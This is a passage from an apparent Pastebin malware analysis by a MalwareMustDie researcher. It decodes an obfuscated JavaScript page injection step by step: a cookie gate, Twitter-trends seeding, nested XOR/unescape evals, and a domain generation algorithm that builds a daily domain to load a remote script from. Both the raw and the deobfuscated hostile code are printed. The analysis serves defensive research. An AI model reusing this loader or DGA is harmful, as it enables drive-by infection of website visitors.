  103. dz = "
  104. %66un%63ti%6fn%20d%77(%74)%7bca%3d%27%2564ocu%256d%65n%257%34.%2577%72i%25%374e%28%252%32%
  105. 27;c%65%3d%27%2522)%27;cb%3d%27%253%63%73%2563%72%69p%2574 %256c%2561%256e%2567ua%67%2565%
  106. 253d%255c%2522j%61%76a%73%63r%2569p%257%34%255c%252%32%25%33e%27;cc%3d%27%253c%255c%252fsc
  107. %72i%70%2574%253e%27;eval%28un%65%73cap%65(t%29)};";
  108. dd = "
  109. 08y~tuh0:0tqi990;08}%7F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!<0iuqbSx%22<0}%7F~dxSx<0tqi
  110. Sx<0~e}+%19~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M<0dy}uK7}%7F~dx7M<0dy}uK7iuqb7M<0cxyvdY~t
  111. uh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060%20hQQ90;0~e}9050%26#9050%22%26M0;0|uddubcK888dy}u
  112. K7iuqb7M060%20hQQ90,,0%2290;0~e}9050%22%M+%19iuqbSx%220-0|uddubcK8888dy}uK7iuqb7M060%20h##
  113. !!90..0#90;0~e}9050!%";
  114. db = "
  115. 7FtuQd8!90;0!%200;gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mmyv08cxyvdY~tuh0--0%2009kcx
  116. yvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>sxqbS%7FtuQd8!90;0'0;gy~t%7Fg>dg>dbu~tcKyMK%26
  117. M>aeubi>|u~wdx+m0yv08cxyvdY~tuh0.0%209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~t%7Fg>wt>w
  118. udEDSVe||Iuqb89+dy}uK7}%7F~dx7M0-0gy~t%7Fg>wt>wudEDS]%7F~dx89;!+dy}uK7tqi7M0-0gy~t%7Fg>wt>
  119. wudEDSTqdu89+fqb0t-7v";
  120. cu = "
  121. (p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:w{y;xp;s{xpyz;64c}p`|)%$$4|q}s|
  122. `),$*(;}rfuyq*(;p}b*";
  123. ce = "p%2ec%68ar%43od%65At(%30)^(%270x%300%27+es%29)%29;}%7d";
  124. if (document.cookie.indexOf('rf5f6ds') ==- 1){
  125. function callback(x){
  126. window.tw = x;
  127. var d = new Date();
  128. d.setTime(x["as_of"] * 1000);
  129. var h = d.getUTCHours();
  130. window.h = h;
  131. if (h > 8){
  132. d.setUTCDate(d.getUTCDate() - 2);
  133. }
  134. else {
  135. d.setUTCDate(d.getUTCDate() - 3);
  136. }
  137. window.gd = d;
  138. var time = new Array();
  139. var shiftIndex = "";
  140. time["year"] = d.getUTCFullYear();
  141. time["month"] = d.getUTCMonth() + 1;
  142. time["day"] = d.getUTCDate();
  143. if (d.getUTCMonth() + 1 < 10){
  144. shiftIndex = time["year"] + "-0" + (d.getUTCMonth() + 1);
  145. }
  146. else {
  147. shiftIndex = time["year"] + "-" + (d.getUTCMonth() + 1);
  148. }
  149. if (d.getUTCDate() < 10){
  150. shiftIndex = shiftIndex + "-0" + d.getUTCDate();
  151. }
  152. else {
  153. shiftIndex = shiftIndex + "-" + d.getUTCDate();
  154. }
  155. document.write("<scr" + "ipt language=javascript" +
  156. " src='http://search.twitter.com/trends/daily.json?date=" + shiftIndex +
  157. "&callback=callback2'>" + "</scr" + "ipt>");
  158. }
  159. function callback2(x){
  160. window.tw = x;
  161. sc('rf5f6ds', 2, 7);
  162. eval(unescape(dz + cz + op + st) + 'dw(dz+cz($a+st));');
  163. document.write($a);
  164. }
  165. document.write("
  166. <img src='http://search.twitter.com/images/search/rss.png' width=1 height=1 style='visibil
  167. ity:hidden' /> <scr" + "ipt language=javascript" +
  168. " src='http://search.twitter.com/trends/daily.json?callback=callback'>" + "</scr" +
  169. "ipt>");
  170. }
  171. else {
  172. $a = ''
  173. }
  174. ;
  175. function sc(cnm, v, ed){
  176. var exd = new Date();
  177. exd.setDate(exd.getDate() + ed);
  178. document.cookie = cnm + '=' + escape(v) + ';expires=' + exd.toGMTString();
  179. };
  180.  
  181. // there are three possibilities here, the last one goes to twitter,
  182. // goes with the default access without cookies...
  183.  
  184. <img src='http://search.twitter.com/images/search/rss.png' width=1 height=1 style=
  185. 'visibility:hidden' /> <script language=javascript src=
  186. 'http://search.twitter.com/trends/daily.json?callback=callback'></script>
  187.  
  188.  
  189. // then above one also goes to twitter with the same pattern..
  190.  
  191. <img src='http://search.twitter.com/images/search/rss.png' width=1 height=1 style='visibil
  192. ity:hidden' /> <script language=javascript src=
  193. 'http://search.twitter.com/trends/daily.json?date=COOKIEBASEDATE&callback=callback'></script>
  194.  
  195.  
  196. // but it also has the deobfuscated ones as per follows... this is the POINT!....
  197. // I decoded it as per below....
  198.  
  199.  
  200. //Let's put these strings operations together and see what it leads us into...
  201.  
  202. st = "%73t%3d%22%24%61%3dst%3bd%63%73%28%64%61+%64%62%2bd%63+%64%64+%64e%2c%31%30%29;%64%77(%73%74%29%3bs%74%3d$%61%3b%22;";
  203. ca = "%66u%6ect%69%6fn%20d%63%73%28ds%2ces%29%7bds%3dun%65s%";
  204. da = "fqb0t-7vrs}vyb>s%7F}7+0fqb0cxyvdY~tuh0-0%20+v%7Fb08fqb0y0y~0gy~t%7Fg>dg>dbu~tc9kyv08gy~t%7Fg>x0.0(0660gy~t%7Fg>x0,0%22!0660y>y~tuh_v870%20'790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%7FtuQd8!90;0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mu|cu0yv088gy~t%7Fg>x0,0)0ll00gy~t%7Fg>x0.0%22%2090660y>y~tuh_v870!(790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%";
  205. dc = "rs}vyb>s%7F}7+fqb0}%7F~dxc0-0~ug0Qbbqi87e~%7F7<07tfu7<07dxb7<07vyb7<07fyv7<07huc7<07fuc7<07wxd7<07u~y7<07ud~7<07|uf7<07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7z7<7y7<7{7<7|7<7}7<7~7<7%7F7<7`7<7a7<7b7<7c7<7d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~e}rubc0-0~ug0Qbbqi8!<%22<#<$<%<%26<'<(<)9+%19ve~sdy%7F~0Sq|se|qdu]qwys^e}rub8tqi<0}%7F~dx<0iuqb<0y~tuh9kbudeb~0888iuqb0;";
  206. cc = ".le%6egth%3bi%2b%2b%29%7btmp%3dds.%73lic%65(i,%69+%31)";
  207. de = "209M0;0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0$90;0~e}9050!%209M+%19}%7F~dxSx0-0|uddubcK88dy}uK7}%7F~dx7M0;0~e}9050%22%9M0;0|uddubcK88dy}uK7}%7F~dx7M0:0~e}9050%22%9M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0%269050%22'9M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050%22$9M+4q-4q>bu`|qsu8t<tqiSx0;0iuqbSx%220;0}%7F~dxSx0;0iuqbSx!0;0tqiSx0;0}%7F~dxcKdy}uK7}%7F~dx7M0=0!M0;07>s%7F}79+m";
  208. cz = "%66unc%74%69%6f%6e c%7a%28%63z)%7br%65tur%6e%20ca+%63b+c%63+cd%2bc%65+%63z;%7d;";
  209. cb = "63%61pe(%64s);%73t%3dt%6d%70%3d%27%27;for(i%3d0;i%3cds";
  210. op = "%24a%3d%22dw(dcs%28%63u,1%34));%22;";
  211. cd = "%3b%73%74%3dst+S%74ri%6eg.%66r%6fmC%68arC%6fd%65((%74m";
  212. dz = "%66un%63ti%6fn%20d%77(%74)%7bca%3d%27%2564ocu%256d%65n%257%34.%2577%72i%25%374e%28%252%32%27;c%65%3d%27%2522)%27;cb%3d%27%253%63%73%2563%72%69p%2574 %256c%2561%256e%2567ua%67%2565%253d%255c%2522j%61%76a%73%63r%2569p%257%34%255c%252%32%25%33e%27;cc%3d%27%253c%255c%252fsc%72i%70%2574%253e%27;eval%28un%65%73cap%65(t%29)};";
  213. dd = "08y~tuh0:0tqi990;08}%7F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!<0iuqbSx%22<0}%7F~dxSx<0tqiSx<0~e}+%19~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M<0dy}uK7}%7F~dx7M<0dy}uK7iuqb7M<0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060%20hQQ90;0~e}9050%26#9050%22%26M0;0|uddubcK888dy}uK7iuqb7M060%20hQQ90,,0%2290;0~e}9050%22%M+%19iuqbSx%220-0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0#90;0~e}9050!%";
  214. db = "7FtuQd8!90;0!%200;gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mmyv08cxyvdY~tuh0--0%2009kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>sxqbS%7FtuQd8!90;0'0;gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>|u~wdx+m0yv08cxyvdY~tuh0.0%209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~t%7Fg>wt>wudEDSVe||Iuqb89+dy}uK7}%7F~dx7M0-0gy~t%7Fg>wt>wudEDS]%7F~dx89;!+dy}uK7tqi7M0-0gy~t%7Fg>wt>wudEDSTqdu89+fqb0t-7v";
  215. cu = "(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:w{y;xp;s{xpyz;64c}p`|)%$$4|q}s|`),$*(;}rfuyq*(;p}b*";
  216. ce = "p%2ec%68ar%43od%65At(%30)^(%270x%300%27+es%29)%29;}%7d";
  217.  
  218. // ok then let's kidnapped their evil formula....
  219.  
  220. eval(unescape(dz + cz + op + st) + 'dw(dz+cz($a+st));');
  221. document.write($a);
  222.  
  223.  
  224. // runs it here see how the eval sets will come up...
  225.  
  226. first eval() =
  227. function dw(t){ca='%64ocu%6den%74.%77ri%74e(%22';ce='%22)';cb='%3cs%63rip%74 %6c%61%6e%67uag%65%3d%5c%22javascr%69p%74%5c%22%3e';cc='%3c%5c%2fscrip%74%3e';eval(unescape(t))};function dcs(ds,es){ds=unescape(ds);st=tmp='';for(i=0;i<ds.length;i++){tmp=ds.slice(i,i+1);st=st+String.fromCharCode((tmp.charCodeAt(0)^('0x00'+es)));}}dw(dcs(cu,14));$a=st;dcs(da+db+dc+dd+de,10);dw(st);st=$a;
  228.  
  229. second eval () =
  230. "undefined" // so be it... :-))
  231.  
  232. third eval() =
  233. function dw(t){ca='%64ocu%6den%74.%77ri%74e(%22';ce='%22)';cb='%3cs%63rip%74 %6c%61%6e%67uag%65%3d%5c%22javascr%69p%74%5c%22%3e';cc='%3c%5c%2fscrip%74%3e';eval(unescape(t))};function cz(cz){return ca+cb+cc+cd+ce+cz;};$a="dw(dcs(cu,14));";st="$a=st;dcs(da+db+dc+dd+de,10);dw(st);st=$a;";dw(dz+cz($a+st));
  234.  
  235. fourth eval() =
  236. var d='fbcmfir.com'; var shiftIndex = 0;for (var i in window.tw.trends){if (window.h > 8 && window.h < 21 && i.indexOf(' 07') > -1){shiftIndex = window.tw.trends[i][4].query.charCodeAt(1) + window.tw.trends[i][4].query.length;break;}else if ((window.h < 9 || window.h > 20) && i.indexOf(' 18') > -1){shiftIndex = window.tw.trends[i][4].query.charCodeAt(1) + 10 +window.tw.trends[i][4].query.length;break;}}if (shiftIndex == 0 ){shiftIndex = window.tw.trends[i][6].query.charCodeAt(1) + 7 +window.tw.trends[i][6].query.length;} if (shiftIndex > 0){var time = new Array();time['year'] = window.gd.getUTCFullYear();time['month'] = window.gd.getUTCMonth()+1;time['day'] = window.gd.getUTCDate();var d='fbcmfir.com';var months = new Array('uno', 'dve', 'thr', 'fir', 'vif', 'xes', 'ves', 'ght', 'eni', 'etn', 'lev', 'twe');var letters = new Array('a','b','c','d','e','f','g','h','j','i','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');var numbers = new Array(1,2,3,4,5,6,7,8,9); function CalculateMagicNumber(day, month, year, index){return (((year + (index * day)) + (month ^ day) * index) + day);} var yearCh1, yearCh2, monthCh, dayCh, num; num = CalculateMagicNumber(time['day'], time['month'], time['year'], shiftIndex);yearCh1 = letters[(((time['year'] & 0xAA) + num) % 63) % 26] + letters[(((time['year'] & 0xAA) << 2) + num) % 25]; yearCh2 = letters[((((time['year'] & 0x3311) >> 3) + num) % 10)] + letters[((((time['year'] & 0x3311) >> 4) + num) % 10)]; monthCh = letters[((time['month'] + num) % 25)] + letters[((time['month'] * num) % 25)];dayCh = letters[((time['day'] * 6) % 27)]; timeCh = dayCh = letters[((time['day'] * num) % 24)];$a=$a.replace(d,dayCh + yearCh2 + monthCh + yearCh1 + dayCh + months[time['month'] - 1] + '.com');}
  237.  
  238.  
  239. // if we put them all together we will have the PSEUDO RANDOM!! see below....
  240.  
  241. function dw(t)
  242. {
  243. ca='%64ocu%6den%74.%77ri%74e(%22'; //<=====The crook's way to obfs "<script language=\"javascript\"><\/script>"
  244. ce='%22)';
  245. cb='%3cs%63rip%74 %6c%61%6e%67uag%65%3d%5c%22javascr%69p%74%5c%22%3e';
  246. cc='%3c%5c%2fscrip%74%3e';
  247. eval(unescape(t))
  248. }
  249. ;function dcs(ds,es)
  250. {
  251. ds=unescape(ds);
  252. st=tmp='';
  253. for(i=0;
  254. i<ds.length;
  255. i++)
  256. {
  257. tmp=ds.slice(i,i+1);
  258. st=st+String.fromCharCode((tmp.charCodeAt(0)^('0x00'+es)));
  259. }
  260.  
  261. }
  262. dw(dcs(cu,14));
  263. $a=st;
  264. dcs(da+db+dc+dd+de,10);
  265. dw(st);
  266. st=$a;
  267. function dw(t)
  268. {
  269. ca='%64ocu%6den%74.%77ri%74e(%22'; //<=====The crook's way to obfs "<script language=\"javascript\"><\/script>"
  270. ce='%22)';
  271. cb='%3cs%63rip%74 %6c%61%6e%67uag%65%3d%5c%22javascr%69p%74%5c%22%3e';
  272. cc='%3c%5c%2fscrip%74%3e';
  273. eval(unescape(t))
  274. }
  275. ;function cz(cz)
  276. {
  277. return ca+cb+cc+cd+ce+cz;
  278. }
  279. ;$a="dw(dcs(cu,14));
  280. ";
  281. st="$a=st;
  282. dcs(da+db+dc+dd+de,10);
  283. dw(st);
  284. st=$a;
  285. ";
  286. dw(dz+cz($a+st));
  287.  
  288.  
  289. var d='fbcmfir.com';
  290. var shiftIndex = 0;
  291. for (var i in window.tw.trends)
  292. {
  293. if (window.h > 8 && window.h < 21 && i.indexOf(' 07') > -1)
  294. {
  295. shiftIndex = window.tw.trends[i][4].query.charCodeAt(1) + window.tw.trends[i][4].query.length;
  296. break;
  297. }
  298. else if ((window.h < 9 || window.h > 20) && i.indexOf(' 18') > -1)
  299. {
  300. shiftIndex = window.tw.trends[i][4].query.charCodeAt(1) + 10 +window.tw.trends[i][4].query.length;
  301. break;
  302. }
  303.  
  304. }
  305. if (shiftIndex == 0 )
  306. {
  307. shiftIndex = window.tw.trends[i][6].query.charCodeAt(1) + 7 +window.tw.trends[i][6].query.length;
  308. }
  309. if (shiftIndex > 0)
  310. {
  311.  
  312. //====================The PseudoRandom/DGA Generator is from here=============================
  313. var time = new Array();
  314. time['year'] = window.gd.getUTCFullYear();
  315. time['month'] = window.gd.getUTCMonth()+1;
  316. time['day'] = window.gd.getUTCDate();
  317. var d='fbcmfir.com';
  318. var months = new Array('uno', 'dve', 'thr', 'fir', 'vif', 'xes', 'ves', 'ght', 'eni', 'etn', 'lev', 'twe');
  319. var letters = new Array('a','b','c','d','e','f','g','h','j','i','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');
  320. var numbers = new Array(1,2,3,4,5,6,7,8,9);
  321. function CalculateMagicNumber(day, month, year, index)
  322. {
  323. return (((year + (index * day)) + (month ^ day) * index) + day);
  324. }
  325. var yearCh1, yearCh2, monthCh, dayCh, num;
  326. num = CalculateMagicNumber(time['day'], time['month'], time['year'], shiftIndex);
  327. yearCh1 = letters[(((time['year'] & 0xAA) + num) % 63) % 26] + letters[(((time['year'] & 0xAA) << 2) + num) % 25];
  328. yearCh2 = letters[((((time['year'] & 0x3311) >> 3) + num) % 10)] + letters[((((time['year'] & 0x3311) >> 4) + num) % 10)];
  329. monthCh = letters[((time['month'] + num) % 25)] + letters[((time['month'] * num) % 25)];
  330. dayCh = letters[((time['day'] * 6) % 27)];
  331. timeCh = dayCh = letters[((time['day'] * num) % 24)];
  332. $a=$a.replace(d,dayCh + yearCh2 + monthCh + yearCh1 + dayCh + months[time['month'] - 1] + '.com');
  333. }
  334. ----------------------
  335. Domine, dimitte nobis debita nostra,
  336. salva nos ab igne inferiori,
  337. perduc in caelum omnes animas,
  338. praesertim eas, quae misericordiae tuae maxime indigent.
  339. #MalwareMustDie!!!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!